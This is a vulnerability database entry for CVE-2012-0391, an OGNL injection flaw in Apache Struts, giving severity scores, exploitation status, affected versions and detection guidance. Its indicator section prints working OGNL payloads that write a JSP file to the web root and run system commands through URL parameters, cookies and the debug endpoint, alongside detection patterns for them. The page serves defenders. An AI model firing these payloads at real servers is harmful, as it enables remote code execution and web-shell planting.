cbcvebase.
CVE-2012-0391
published 2012-01-08

CVE-2012-0391: The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for…

PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-07-21
Exploited in the wild
EPSS
75.07%
99.4th percentile
The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
apachestruts< 2.2.3.12.2.3.1

Detection & IOCsextracted from sources · hover to see the quote

url/Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b'
url/Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
cookie(#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1
url/Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')
command'%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec("CMD"))%2b'
command'%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec("CMD".split("@")))%2b'
  • Detect OGNL injection attempts in HTTP parameters: look for URL-encoded OGNL payloads containing '%23_memberAccess' or '@java.lang.Runtime@getRuntime' in GET/POST parameter values, which indicate exploitation of the ExceptionDelegator type-mismatch code path.
  • Detect OGNL injection via Cookie header: monitor for Cookie headers containing '#_memberAccess' or '\u003d' (Unicode-encoded '=') combined with '@java.lang.Runtime@getRuntime().exec' patterns, as used in the cookie-based attack vector.
  • Detect use of the Struts developer-mode debug endpoint as an attack vector: requests containing 'debug=command&expression=' with OGNL payloads should be flagged, as this endpoint evaluates arbitrary OGNL expressions.
  • The Metasploit module targets the TARGETURI parameter with an INJECT placeholder replaced by OGNL payload; monitor for GET requests to Struts action URLs containing '%2b(' and '%23_memberAccess' in parameter values as a strong exploitation indicator.
  • ·The vulnerability affects Apache Struts versions up to and including 2.2.3 (before 2.2.3.1); the Metasploit module specifically targets versions < 2.2.1.1, while the original advisory confirms 2.3.1 and below are vulnerable. Ensure version scoping is correct when applying detections.
  • ·The cookie-based and debug-endpoint attack vectors (PoC 2 and 3) were confirmed against Struts 2.2.1.1, 2.2.3.1, and 2.3.1, meaning the fixed version 2.2.3.1 is still vulnerable to those specific vectors; detections should not assume 2.2.3.1 is fully safe.
  • ·Developer mode ('debug=command') must be disabled as a workaround; applications running in developer mode expose an additional OGNL expression evaluation endpoint that is independently exploitable.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.